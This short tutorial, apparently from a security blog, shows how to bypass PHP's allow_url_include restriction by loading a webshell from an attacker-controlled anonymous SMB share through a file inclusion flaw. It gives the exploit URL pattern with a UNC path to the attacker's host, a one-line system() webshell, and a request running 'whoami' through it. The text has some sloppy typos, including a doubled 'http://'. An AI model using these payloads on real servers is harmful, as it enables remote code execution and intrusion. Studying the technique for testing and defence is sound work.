PHP LFI/RFI Vulnerability attack bypassing remote URL inclusion restriction

File Inclusion vulnerability

In the PHP Configuration,"allow_url_include" wrapper by-default set to "Off" which instruct PHP not ot load remote HTTP or FTP urls.Hence prevent Remote File Inclusion attack.But PHP does not block SMB URL loading even if even if "allow_url_include" and "allow_url_fopen" both are set to "Off".These behavior of PHP can be abused to load remotely hosted PHP webshell from SMB share.

Attack scenario outline

When vulnerable PHP application code try to load PHP webshell from attacker controlled SMB share which should allow access to the file.Attacker need to configure SMB server with anonymous browsing access enable on it. So, once vulnerable application try to access PHP web shell from  SMB share, SMB server will not ask for any credential and PHP code of web shell will be included by the vulnerable application. 

Verification environment

allow_url_fopen = OFF

allow_url_include=off

PHP version=5.5.11

Running the Smbserver with anonymous

Exploiting

http://vulnerability_machine_ip/page.php?lang=\\exploit_ip\xxx\xx.php

We can add some php script(trojan.php) of system function (one sentence trojan) like 

<?php system($_REQUEST[cmd])?>

If we want to utiliz the trojan we can send the package as below:

http://http://vulnerability_machine_ip/page.php?lang=\\exploit_ip\trojan.php&cmd=whoami

The machine will execute the command